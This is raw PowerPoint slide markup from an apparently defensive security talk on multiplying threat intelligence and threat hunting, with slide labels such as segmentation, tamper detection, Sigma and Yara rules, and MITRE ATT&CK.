              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7156153D-34DE-9763-498D-18BE697AD20F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8903141" y="3551085"/>
            <a:ext cx="2631692" cy="2602135"/>
            <a:chOff x="8618831" y="3830972"/>
            <a:chExt cx="2631692" cy="1857796"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B58FAF1-67E1-E001-3C12-5939384587E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8618831" y="4436111"/>
              <a:ext cx="2631692" cy="1252657"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B22CE0A6-0B1D-6F30-0AE6-6E217E639DF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8618831" y="3830972"/>
              <a:ext cx="2584314" cy="527370"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Terrain Obstacles</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Privileged Admin Workstations</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Segmentation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B5B48C-9255-D35C-83FE-127F52C379F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3858279" y="5121567"/>
            <a:ext cx="515133" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>[1]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7294025A-90AD-1BA1-9D33-C30CFE177574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4965252" y="3427651"/>
            <a:ext cx="3057899" cy="3104926"/>
            <a:chOff x="4965252" y="3741755"/>
            <a:chExt cx="3057899" cy="3104926"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D91D40EE-4F45-BAEE-4641-0952123E74BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334538" y="4355701"/>
              <a:ext cx="2319326" cy="2490980"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4C3B9DE-98A9-CB49-A339-2F6858719932}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4965252" y="3741755"/>
              <a:ext cx="3057899" cy="553998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Tamper Detection Seals</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>Defense Evasion Detection</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFBEA51B-FCE0-C421-94E3-8F15EB40737C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-21863" y="4056437"/>
            <a:ext cx="2473070" cy="2096783"/>
            <a:chOff x="70345" y="4056437"/>
            <a:chExt cx="2473070" cy="2096783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947FD1CD-4EEC-CE41-6C05-CE69195D654E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="70345" y="4056437"/>
              <a:ext cx="2473070" cy="553998"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Breaking &amp; Entering</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0"/>
                <a:t>Exploit Failures</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C60DDD01-4AE5-2EF9-459B-1E8511C0BDE1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId8"/>
            <a:srcRect l="14989"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="299851" y="4716639"/>
              <a:ext cx="1949470" cy="1436581"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05EA9F5F-895A-08FF-0802-D1831DBF50C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="470721" y="1380515"/>
            <a:ext cx="1667310" cy="2155098"/>
            <a:chOff x="470721" y="1380515"/>
            <a:chExt cx="1667310" cy="2155098"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9539789D-5DC7-68D5-D89B-7799FC9028F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="665264" y="1380515"/>
              <a:ext cx="1278223" cy="615553"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Attack Detection</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="Picture 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5851431A-89A8-8489-3F21-D68B2B48548F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="470721" y="2024996"/>
              <a:ext cx="1667310" cy="1510617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2609493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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>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34D8D9-C72F-BA5E-F121-9774C91F71EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600060" y="3004821"/>
            <a:ext cx="4210461" cy="984885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strategies to Multiply Threat Intelligence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16100170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B50ED-D680-E902-E08C-30CEEFC15B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat Hunting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{632243D3-09C8-120D-5844-2B468E144BF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7800755" y="1797853"/>
            <a:ext cx="3789356" cy="3084783"/>
            <a:chOff x="774502" y="2632358"/>
            <a:chExt cx="4423776" cy="3533664"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258AECEE-F5A0-ED63-AB28-F5B7787D1129}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="774503" y="2940135"/>
              <a:ext cx="4423775" cy="3225887"/>
              <a:chOff x="3150918" y="67189"/>
              <a:chExt cx="8231652" cy="6994525"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="Picture 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44993A8B-A161-061D-4EB9-AC6064F86AE0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3150918" y="67189"/>
                <a:ext cx="8231652" cy="699452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0307B78-10C0-9B1E-C3E3-281931A09879}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill rotWithShape="1">
              <a:blip r:embed="rId4"/>
              <a:srcRect r="54790" b="82206"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="9870508" y="67189"/>
                <a:ext cx="1512062" cy="638691"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B59F65A8-9AE0-1624-D2B4-2B8D4CCD1EAD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="774502" y="2632358"/>
              <a:ext cx="4423775" cy="374532"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Sigma and Yara rules</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8BC1F3-8FB7-BACB-0177-FD6AB7D33AB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="321749" y="1150289"/>
            <a:ext cx="3270830" cy="3098756"/>
            <a:chOff x="5538624" y="1454322"/>
            <a:chExt cx="3270830" cy="3098756"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="Picture 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0970F9E9-3E4C-0440-2C48-5ADAE39D5306}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5"/>
            <a:srcRect r="37977"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5538624" y="1751514"/>
              <a:ext cx="3270830" cy="280156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2AD9786-2A72-CCC6-7DE7-E19EECCF8409}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5538624" y="1454322"/>
              <a:ext cx="3270830" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>MITRE ATT&amp;CK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F688643-9A10-2E6B-8E83-280C8E9040B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4215229" y="1236657"/>
            <a:ext cx="2684122" cy="4407051"/>
            <a:chOff x="435253" y="1425610"/>
            <a:chExt cx="2684122" cy="4407051"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45A15A0D-215E-F406-5B93-C95A68A3927F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="435253" y="1425610"/>
              <a:ext cx="2684122" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Blogs</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="Picture 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462E6B85-FEC8-51FD-9B5D-061141109CAB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="435253" y="1751514"/>
              <a:ext cx="2684122" cy="4081147"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB18C54-F2AA-7463-E469-4A03D3E211C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="430072" y="4394957"/>
            <a:ext cx="3473832" cy="2454118"/>
            <a:chOff x="430072" y="4394957"/>
            <a:chExt cx="3473832" cy="2454118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Picture 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0114EEB-8D14-A239-6E41-08B352C8E440}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId7"/>
            <a:srcRect t="1521" b="1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="430073" y="4701744"/>
              <a:ext cx="3473831" cy="2147331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4342ECE-D604-A9B8-94F4-208DA0D30D36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="430072" y="4394957"/>
              <a:ext cx="3473831" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0"/>
                <a:t>Tweets</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36555713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3054BDE-A17D-70B4-ADCD-AB015A0B3934}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Approach to Multiplying Threat Intelligence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDD4F657-34A1-FD3C-06A6-6FC3F67D980A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Foundational Concepts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365E0EBA-425C-521F-BB13-CA1F8E9691E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Every contact leaves a trace…in a log</a:t>
            </a:r>
          </a:p>
          <a:p>
